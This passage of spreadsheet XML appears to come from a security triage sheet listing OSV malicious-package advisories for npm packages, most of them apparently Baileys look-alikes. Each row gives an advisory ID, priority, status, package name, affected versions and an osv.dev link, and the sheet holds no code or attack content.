      <c r="P87" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q87" s="5" t="inlineStr"/>
      <c r="R87" s="5" t="inlineStr"/>
      <c r="S8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@xatancchii/velycxbail (npm), version(s): 1.1.0.</t>
        </is>
      </c>
      <c r="T87" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17383</t>
        </is>
      </c>
    </row>
    <row r="88">
      <c r="A88" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B88" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C88" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17384</t>
        </is>
      </c>
      <c r="D88" s="5" t="inlineStr"/>
      <c r="E88" s="5" t="inlineStr"/>
      <c r="F88" s="5" t="inlineStr"/>
      <c r="G88" s="5" t="inlineStr"/>
      <c r="H88" s="5" t="inlineStr"/>
      <c r="I88" s="5" t="inlineStr"/>
      <c r="J88" s="5" t="inlineStr">
        <is>
          <t>npm</t>
        </is>
      </c>
      <c r="K88" s="5" t="inlineStr"/>
      <c r="L88" s="5" t="inlineStr">
        <is>
          <t>npm:@xayz/baileys</t>
        </is>
      </c>
      <c r="M88" s="5" t="inlineStr"/>
      <c r="N88" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O88" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P88" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q88" s="5" t="inlineStr"/>
      <c r="R88" s="5" t="inlineStr"/>
      <c r="S8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@xayz/baileys (npm), version(s): 6.1.8, 6.1.7, 6.1.6, 6.1.5, 6.1.4, 6.1.3, 6.1.2, 6.1.1, 6.1.0, 6.0.75, 6.0.6, 6.0.5, 6.0.4, 6.0.3, 6.0.2, 6.0.1, 6.0.0, 5.0.0, 4.0.0, 3.0.0.</t>
        </is>
      </c>
      <c r="T88" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17384</t>
        </is>
      </c>
    </row>
    <row r="89">
      <c r="A89" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B89" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C89" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17385</t>
        </is>
      </c>
      <c r="D89" s="5" t="inlineStr"/>
      <c r="E89" s="5" t="inlineStr"/>
      <c r="F89" s="5" t="inlineStr"/>
      <c r="G89" s="5" t="inlineStr"/>
      <c r="H89" s="5" t="inlineStr"/>
      <c r="I89" s="5" t="inlineStr"/>
      <c r="J89" s="5" t="inlineStr">
        <is>
          <t>npm</t>
        </is>
      </c>
      <c r="K89" s="5" t="inlineStr"/>
      <c r="L89" s="5" t="inlineStr">
        <is>
          <t>npm:albert-anitabaileys</t>
        </is>
      </c>
      <c r="M89" s="5" t="inlineStr"/>
      <c r="N89" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O89" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P89" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q89" s="5" t="inlineStr"/>
      <c r="R89" s="5" t="inlineStr"/>
      <c r="S8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albert-anitabaileys (npm), version(s): 1.1.13.</t>
        </is>
      </c>
      <c r="T89" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17385</t>
        </is>
      </c>
    </row>
    <row r="90">
      <c r="A90" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B90" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C90" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17386</t>
        </is>
      </c>
      <c r="D90" s="5" t="inlineStr"/>
      <c r="E90" s="5" t="inlineStr"/>
      <c r="F90" s="5" t="inlineStr"/>
      <c r="G90" s="5" t="inlineStr"/>
      <c r="H90" s="5" t="inlineStr"/>
      <c r="I90" s="5" t="inlineStr"/>
      <c r="J90" s="5" t="inlineStr">
        <is>
          <t>npm</t>
        </is>
      </c>
      <c r="K90" s="5" t="inlineStr"/>
      <c r="L90" s="5" t="inlineStr">
        <is>
          <t>npm:anuaja</t>
        </is>
      </c>
      <c r="M90" s="5" t="inlineStr"/>
      <c r="N90" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O90" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P90" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q90" s="5" t="inlineStr"/>
      <c r="R90" s="5" t="inlineStr"/>
      <c r="S9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anuaja (npm), version(s): 1.1.1, 1.1.0, 1.0.0.</t>
        </is>
      </c>
      <c r="T90" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17386</t>
        </is>
      </c>
    </row>
    <row r="91">
      <c r="A91" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B91" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C91" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17387</t>
        </is>
      </c>
      <c r="D91" s="5" t="inlineStr"/>
      <c r="E91" s="5" t="inlineStr"/>
      <c r="F91" s="5" t="inlineStr"/>
      <c r="G91" s="5" t="inlineStr"/>
      <c r="H91" s="5" t="inlineStr"/>
      <c r="I91" s="5" t="inlineStr"/>
      <c r="J91" s="5" t="inlineStr">
        <is>
          <t>npm</t>
        </is>
      </c>
      <c r="K91" s="5" t="inlineStr"/>
      <c r="L91" s="5" t="inlineStr">
        <is>
          <t>npm:arsya-baileys</t>
        </is>
      </c>
      <c r="M91" s="5" t="inlineStr"/>
      <c r="N91" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O91" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P91" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q91" s="5" t="inlineStr"/>
      <c r="R91" s="5" t="inlineStr"/>
      <c r="S9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arsya-baileys (npm), version(s): 9.2.0.</t>
        </is>
      </c>
      <c r="T91" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17387</t>
        </is>
      </c>
    </row>
    <row r="92">
      <c r="A92" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B92" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C92" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17388</t>
        </is>
      </c>
      <c r="D92" s="5" t="inlineStr"/>
      <c r="E92" s="5" t="inlineStr"/>
      <c r="F92" s="5" t="inlineStr"/>
      <c r="G92" s="5" t="inlineStr"/>
      <c r="H92" s="5" t="inlineStr"/>
      <c r="I92" s="5" t="inlineStr"/>
      <c r="J92" s="5" t="inlineStr">
        <is>
          <t>npm</t>
        </is>
      </c>
      <c r="K92" s="5" t="inlineStr"/>
      <c r="L92" s="5" t="inlineStr">
        <is>
          <t>npm:baileys-xbats</t>
        </is>
      </c>
      <c r="M92" s="5" t="inlineStr"/>
      <c r="N92" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O92" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P92" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q92" s="5" t="inlineStr"/>
      <c r="R92" s="5" t="inlineStr"/>
      <c r="S9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baileys-xbats (npm), version(s): 1.0.3, 1.0.2, 1.0.1, 1.0.0.</t>
        </is>
      </c>
      <c r="T92" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17388</t>
        </is>
      </c>
    </row>
    <row r="93">
      <c r="A93" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B93" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C93" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17389</t>
        </is>
      </c>
      <c r="D93" s="5" t="inlineStr"/>
      <c r="E93" s="5" t="inlineStr"/>
      <c r="F93" s="5" t="inlineStr"/>
      <c r="G93" s="5" t="inlineStr"/>
      <c r="H93" s="5" t="inlineStr"/>
      <c r="I93" s="5" t="inlineStr"/>
      <c r="J93" s="5" t="inlineStr">
        <is>
          <t>npm, go</t>
        </is>
      </c>
      <c r="K93" s="5" t="inlineStr"/>
      <c r="L93" s="5" t="inlineStr">
        <is>
          <t>npm:bungoma</t>
        </is>
      </c>
      <c r="M93" s="5" t="inlineStr"/>
      <c r="N93" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O93" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P93" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q93" s="5" t="inlineStr"/>
      <c r="R93" s="5" t="inlineStr"/>
      <c r="S9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bungoma (npm), version(s): 1.1.0, 1.0.1.</t>
        </is>
      </c>
      <c r="T93" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17389</t>
        </is>
      </c>
    </row>
    <row r="94">
      <c r="A94" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B94" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C94" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17390</t>
        </is>
      </c>
      <c r="D94" s="5" t="inlineStr"/>
      <c r="E94" s="5" t="inlineStr"/>
      <c r="F94" s="5" t="inlineStr"/>
      <c r="G94" s="5" t="inlineStr"/>
      <c r="H94" s="5" t="inlineStr"/>
      <c r="I94" s="5" t="inlineStr"/>
      <c r="J94" s="5" t="inlineStr">
        <is>
          <t>npm</t>
        </is>
      </c>
      <c r="K94" s="5" t="inlineStr"/>
      <c r="L94" s="5" t="inlineStr">
        <is>
          <t>npm:cantarella-baileys</t>
        </is>
      </c>
      <c r="M94" s="5" t="inlineStr"/>
      <c r="N94" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O94" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P94" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q94" s="5" t="inlineStr"/>
      <c r="R94" s="5" t="inlineStr"/>
      <c r="S9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cantarella-baileys (npm), version(s): 1.1.13, 1.1.12, 1.1.11.</t>
        </is>
      </c>
      <c r="T94" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17390</t>
        </is>
      </c>
    </row>
    <row r="95">
      <c r="A95" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B95" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C95" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17391</t>
        </is>
      </c>
      <c r="D95" s="5" t="inlineStr"/>
      <c r="E95" s="5" t="inlineStr"/>
      <c r="F95" s="5" t="inlineStr"/>
      <c r="G95" s="5" t="inlineStr"/>
      <c r="H95" s="5" t="inlineStr"/>
      <c r="I95" s="5" t="inlineStr"/>
      <c r="J95" s="5" t="inlineStr">
        <is>
          <t>npm</t>
        </is>
      </c>
      <c r="K95" s="5" t="inlineStr"/>
      <c r="L95" s="5" t="inlineStr">
        <is>
          <t>npm:eliteprotech-baileys</t>
        </is>
      </c>
      <c r="M95" s="5" t="inlineStr"/>
      <c r="N95" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O95" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P95" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q95" s="5" t="inlineStr"/>
      <c r="R95" s="5" t="inlineStr"/>
      <c r="S9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eliteprotech-baileys (npm), version(s): 1.1.2, 1.1.1, 1.1.0.</t>
        </is>
      </c>
      <c r="T95" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17391</t>
        </is>
      </c>
    </row>
    <row r="96">
      <c r="A96" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B96" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C96" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17392</t>
        </is>
      </c>
      <c r="D96" s="5" t="inlineStr"/>
      <c r="E96" s="5" t="inlineStr"/>
      <c r="F96" s="5" t="inlineStr"/>
      <c r="G96" s="5" t="inlineStr"/>
      <c r="H96" s="5" t="inlineStr"/>
      <c r="I96" s="5" t="inlineStr"/>
      <c r="J96" s="5" t="inlineStr">
        <is>
          <t>npm</t>
        </is>
      </c>
      <c r="K96" s="5" t="inlineStr"/>
      <c r="L96" s="5" t="inlineStr">
        <is>
          <t>npm:focashi</t>
        </is>
      </c>
      <c r="M96" s="5" t="inlineStr"/>
      <c r="N96" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O96" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P96" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q96" s="5" t="inlineStr"/>
      <c r="R96" s="5" t="inlineStr"/>
      <c r="S9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focashi (npm), version(s): 1.1.0.</t>
        </is>
      </c>
      <c r="T96" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17392</t>
        </is>
      </c>
    </row>
    <row r="97">
      <c r="A97" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B97" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C97" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17393</t>
        </is>
      </c>
      <c r="D97" s="5" t="inlineStr"/>
      <c r="E97" s="5" t="inlineStr"/>
      <c r="F97" s="5" t="inlineStr"/>
      <c r="G97" s="5" t="inlineStr"/>
      <c r="H97" s="5" t="inlineStr"/>
      <c r="I97" s="5" t="inlineStr"/>
      <c r="J97" s="5" t="inlineStr">
        <is>
          <t>npm</t>
        </is>
      </c>
      <c r="K97" s="5" t="inlineStr"/>
      <c r="L97" s="5" t="inlineStr">
        <is>
          <t>npm:ishumdz-bail</t>
        </is>
      </c>
      <c r="M97" s="5" t="inlineStr"/>
      <c r="N97" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O97" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P97" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q97" s="5" t="inlineStr"/>
      <c r="R97" s="5" t="inlineStr"/>
      <c r="S9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ishumdz-bail (npm), version(s): 1.0.16, 1.0.15, 1.0.14, 1.0.13, 1.0.11, 1.0.10, 1.0.9, 1.0.8, 1.0.7, 1.0.6, 1.0.4, 1.0.3, 1.0.2, 1.0.1.</t>
        </is>
      </c>
      <c r="T97" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17393</t>
        </is>
      </c>
    </row>
    <row r="98">
      <c r="A98" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B98" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C98" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17394</t>
        </is>
      </c>
      <c r="D98" s="5" t="inlineStr"/>
      <c r="E98" s="5" t="inlineStr"/>
      <c r="F98" s="5" t="inlineStr"/>
      <c r="G98" s="5" t="inlineStr"/>
      <c r="H98" s="5" t="inlineStr"/>
      <c r="I98" s="5" t="inlineStr"/>
      <c r="J98" s="5" t="inlineStr">
        <is>
          <t>npm</t>
        </is>
      </c>
      <c r="K98" s="5" t="inlineStr"/>
      <c r="L98" s="5" t="inlineStr">
        <is>
          <t>npm:kasabaileys</t>
        </is>
      </c>
      <c r="M98" s="5" t="inlineStr"/>
      <c r="N98" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O98" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P98" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q98" s="5" t="inlineStr"/>
      <c r="R98" s="5" t="inlineStr"/>
      <c r="S9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kasabaileys (npm), version(s): 1.0.2, 1.0.1, 1.0.0, 0.3.15.</t>
        </is>
      </c>
      <c r="T98" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17394</t>
        </is>
      </c>
    </row>
    <row r="99">
      <c r="A99" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B99" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C99" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17395</t>
        </is>
      </c>
      <c r="D99" s="5" t="inlineStr"/>
      <c r="E99" s="5" t="inlineStr"/>
      <c r="F99" s="5" t="inlineStr"/>
      <c r="G99" s="5" t="inlineStr"/>
      <c r="H99" s="5" t="inlineStr"/>
      <c r="I99" s="5" t="inlineStr"/>
      <c r="J99" s="5" t="inlineStr">
        <is>
          <t>npm</t>
        </is>
      </c>
      <c r="K99" s="5" t="inlineStr"/>
      <c r="L99" s="5" t="inlineStr">
        <is>
          <t>npm:keithbaileys</t>
        </is>
      </c>
      <c r="M99" s="5" t="inlineStr"/>
      <c r="N99" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O99" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P99" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q99" s="5" t="inlineStr"/>
      <c r="R99" s="5" t="inlineStr"/>
      <c r="S9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keithbaileys (npm), version(s): 1.1.1, 1.1.0, 1.0.8.</t>
        </is>
      </c>
      <c r="T99" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17395</t>
        </is>
      </c>
    </row>
    <row r="100">
      <c r="A100" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B100" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C100" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17396</t>
        </is>
      </c>
      <c r="D100" s="5" t="inlineStr"/>
      <c r="E100" s="5" t="inlineStr"/>
      <c r="F100" s="5" t="inlineStr"/>
      <c r="G100" s="5" t="inlineStr"/>
      <c r="H100" s="5" t="inlineStr"/>
      <c r="I100" s="5" t="inlineStr"/>
      <c r="J100" s="5" t="inlineStr">
        <is>
          <t>npm</t>
        </is>
      </c>
      <c r="K100" s="5" t="inlineStr"/>
      <c r="L100" s="5" t="inlineStr">
        <is>
          <t>npm:kiyoramarkets</t>
        </is>
      </c>
      <c r="M100" s="5" t="inlineStr"/>
      <c r="N100" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O100" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P100" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q100" s="5" t="inlineStr"/>
      <c r="R100" s="5" t="inlineStr"/>
      <c r="S10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kiyoramarkets (npm), version(s): 8.0.16.</t>
        </is>
      </c>
      <c r="T100" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17396</t>
        </is>
      </c>
    </row>
    <row r="101">
      <c r="A101" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B101" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C101" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17397</t>
        </is>
      </c>
      <c r="D101" s="5" t="inlineStr"/>
      <c r="E101" s="5" t="inlineStr"/>
      <c r="F101" s="5" t="inlineStr"/>
      <c r="G101" s="5" t="inlineStr"/>
      <c r="H101" s="5" t="inlineStr"/>
      <c r="I101" s="5" t="inlineStr"/>
      <c r="J101" s="5" t="inlineStr">
        <is>
          <t>npm</t>
        </is>
      </c>
      <c r="K101" s="5" t="inlineStr"/>
      <c r="L101" s="5" t="inlineStr">
        <is>
          <t>npm:levvleys</t>
        </is>
      </c>
      <c r="M101" s="5" t="inlineStr"/>
      <c r="N101" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O101" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P101" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q101" s="5" t="inlineStr"/>
      <c r="R101" s="5" t="inlineStr"/>
      <c r="S10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levvleys (npm), version(s): 2.1.0, 2.0.26, 2.0.25, 2.0.24, 2.0.23, 2.0.22, 2.0.21, 2.0.20, 2.0.19, 2.0.18, 2.0.17, 2.0.16, 2.0.13, 2.0.12, 2.0.11, 2.0.10, 2.0.9, 2.0.8, 2.0.6, 2.0.4.</t>
        </is>
      </c>
      <c r="T101" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17397</t>
        </is>
      </c>
    </row>
    <row r="102">
      <c r="A102" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B102" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C102" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17398</t>
        </is>
      </c>
      <c r="D102" s="5" t="inlineStr"/>
      <c r="E102" s="5" t="inlineStr"/>
      <c r="F102" s="5" t="inlineStr"/>
      <c r="G102" s="5" t="inlineStr"/>
      <c r="H102" s="5" t="inlineStr"/>
      <c r="I102" s="5" t="inlineStr"/>
      <c r="J102" s="5" t="inlineStr">
        <is>
          <t>npm</t>
        </is>
      </c>
      <c r="K102" s="5" t="inlineStr"/>
      <c r="L102" s="5" t="inlineStr">
        <is>
          <t>npm:lilys-baileys</t>
        </is>
      </c>
      <c r="M102" s="5" t="inlineStr"/>
      <c r="N102" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O102" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P102" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q102" s="5" t="inlineStr"/>
      <c r="R102" s="5" t="inlineStr"/>
      <c r="S10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lilys-baileys (npm), version(s): 1.3.3, 1.3.2.</t>
        </is>
      </c>
      <c r="T102" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17398</t>
        </is>
      </c>
    </row>
    <row r="103">
      <c r="A103" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B103" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C103" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17399</t>
        </is>
      </c>
      <c r="D103" s="5" t="inlineStr"/>
      <c r="E103" s="5" t="inlineStr"/>
      <c r="F103" s="5" t="inlineStr"/>
      <c r="G103" s="5" t="inlineStr"/>
      <c r="H103" s="5" t="inlineStr"/>
      <c r="I103" s="5" t="inlineStr"/>
      <c r="J103" s="5" t="inlineStr">
        <is>
          <t>npm</t>
        </is>
      </c>
      <c r="K103" s="5" t="inlineStr"/>
      <c r="L103" s="5" t="inlineStr">
        <is>
          <t>npm:monte-md-baileys</t>
        </is>
      </c>
      <c r="M103" s="5" t="inlineStr"/>
      <c r="N103" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O103" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P103" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q103" s="5" t="inlineStr"/>
      <c r="R103" s="5" t="inlineStr"/>
      <c r="S10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monte-md-baileys (npm), version(s): 1.0.0.</t>
        </is>
      </c>
      <c r="T103" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17399</t>
        </is>
      </c>
    </row>
    <row r="104">
      <c r="A104" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B104" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C104" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17400</t>
        </is>
      </c>
      <c r="D104" s="5" t="inlineStr"/>
      <c r="E104" s="5" t="inlineStr"/>
      <c r="F104" s="5" t="inlineStr"/>
      <c r="G104" s="5" t="inlineStr"/>
      <c r="H104" s="5" t="inlineStr"/>
      <c r="I104" s="5" t="inlineStr"/>
      <c r="J104" s="5" t="inlineStr">
        <is>
          <t>npm</t>
        </is>
      </c>
      <c r="K104" s="5" t="inlineStr"/>
      <c r="L104" s="5" t="inlineStr">
        <is>
          <t>npm:my-baileys</t>
        </is>
      </c>
      <c r="M104" s="5" t="inlineStr"/>
      <c r="N104" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O104" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P104" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q104" s="5" t="inlineStr"/>
      <c r="R104" s="5" t="inlineStr"/>
      <c r="S10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my-baileys (npm), version(s): 1.0.5, 1.0.4, 1.0.3, 1.0.2, 1.0.1.</t>
        </is>
      </c>
      <c r="T104" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17400</t>
        </is>
      </c>
    </row>
    <row r="105">
      <c r="A105" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B105" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C105" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17401</t>
        </is>
      </c>
      <c r="D105" s="5" t="inlineStr"/>
      <c r="E105" s="5" t="inlineStr"/>
      <c r="F105" s="5" t="inlineStr"/>
      <c r="G105" s="5" t="inlineStr"/>
      <c r="H105" s="5" t="inlineStr"/>
      <c r="I105" s="5" t="inlineStr"/>
      <c r="J105" s="5" t="inlineStr">
        <is>
          <t>npm</t>
        </is>
      </c>
      <c r="K105" s="5" t="inlineStr"/>
      <c r="L105" s="5" t="inlineStr">
        <is>
          <t>npm:noverojs</t>
        </is>
      </c>
      <c r="M105" s="5" t="inlineStr"/>
      <c r="N105" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O105" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P105" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q105" s="5" t="inlineStr"/>
      <c r="R105" s="5" t="inlineStr"/>
      <c r="S10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noverojs (npm), version(s): 1.0.4, 1.0.1.</t>
        </is>
      </c>
      <c r="T105" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17401</t>
        </is>
      </c>
    </row>
    <row r="106">
      <c r="A106" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B106" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C106" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17402</t>
        </is>
      </c>
      <c r="D106" s="5" t="inlineStr"/>
      <c r="E106" s="5" t="inlineStr"/>
      <c r="F106" s="5" t="inlineStr"/>
      <c r="G106" s="5" t="inlineStr"/>
      <c r="H106" s="5" t="inlineStr"/>
      <c r="I106" s="5" t="inlineStr"/>
      <c r="J106" s="5" t="inlineStr">
        <is>
          <t>npm</t>
        </is>
      </c>
      <c r="K106" s="5" t="inlineStr"/>
      <c r="L106" s="5" t="inlineStr">
        <is>
          <t>npm:noxleyss</t>
        </is>
      </c>
      <c r="M106" s="5" t="inlineStr"/>
      <c r="N106" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O106" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P106" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q106" s="5" t="inlineStr"/>
      <c r="R106" s="5" t="inlineStr"/>
